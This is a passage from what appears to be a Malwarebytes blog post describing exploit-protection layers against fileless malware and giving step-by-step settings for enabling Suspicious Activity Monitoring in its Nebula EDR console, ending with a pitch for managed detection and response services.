  • Advanced Memory Protection: This layer prevents fileless malware from executing payload code in memory by detecting and blocking techniques such as DEP bypass, memory patch hijacking, and stack pivoting, thereby stopping the attack before it can cause harm.
  • Application Behavior Protection: This layer also detects and blocks exploits that do not rely on memory corruption, such as Java sandbox escapes or application design abuse exploits. Options include Malicious LoadLibrary Protection, Protection for Internet Explorer VB Scripting, Protection for MessageBox Payload, and protection against various Microsoft Office macro exploits.
  • Java Protection: These settings protect against exploits commonly used in Java programs. By guarding against Java-specific exploits, such as web-based Java command execution and Java Meterpreter payloads, Java Protection can effectively prevent fileless attacks that leverage Java vulnerabilities to infiltrate systems and execute malicious code.

Fighting fileless threats with Malwarebytes EDR: Configuring Suspicious Activity Monitoring in Nebula

Malwarebytes Endpoint Detection and Response (EDR) offers an effective solution to detect and mitigate fileless malware threats by monitoring potentially malicious behavior on endpoints. The Suspicious Activity Monitoring feature in Nebula uses machine learning models and cloud-based analysis to detect questionable activities. In this section, we will outline how to configure Suspicious Activity Monitoring in Nebula.

To enable Suspicious Activity Monitoring in your policy:

  • Log in to your Nebula console.
  • Navigate to Configure > Policies.
  • Click “New” or select an existing policy.
  • Choose the “Endpoint Detection and Response” tab.
  • Locate “Suspicious Activity Monitoring” and enable it for the desired operating systems.

[Image: Suspicious Activity Monitoring detections in Nebula showing a possible fileless attack. On the right, we see the command line context for this process in our organization.]

Advanced Settings offer additional options for activity monitoring. To configure these settings:

  • In the same “Endpoint Detection and Response” tab, find the “Advanced Settings” section.
  • Enable “Server operating system monitoring for suspicious activity” to extend monitoring to server operating systems.
  • Enable “Very aggressive detection mode” to apply a tighter threshold for flagging processes as suspicious.
  • Toggle “Collect networking events to include in searching” to ON (default) or OFF, depending on your preference. Turning it OFF decreases traffic sent to the cloud.

Flight Recorder Search

Flight Recorder Search makes all collected endpoint events available to its search functionality. By configuring Suspicious Activity Monitoring in Malwarebytes EDR through the Nebula platform, you can effectively counter fileless malware threats by monitoring process, registry, file system, and network activity on the endpoint.

Respond to fileless attacks quickly and effectively

Managed Detection and Response (MDR) services provide an attractive option for organizations without the expertise to manage EDR solutions. MDR services offer access to experienced security analysts who can monitor and respond to threats 24/7, detect and respond to fileless attacks quickly and effectively, and provide ongoing tuning and optimization of EDR solutions to ensure maximum protection.

Stop fileless attacks today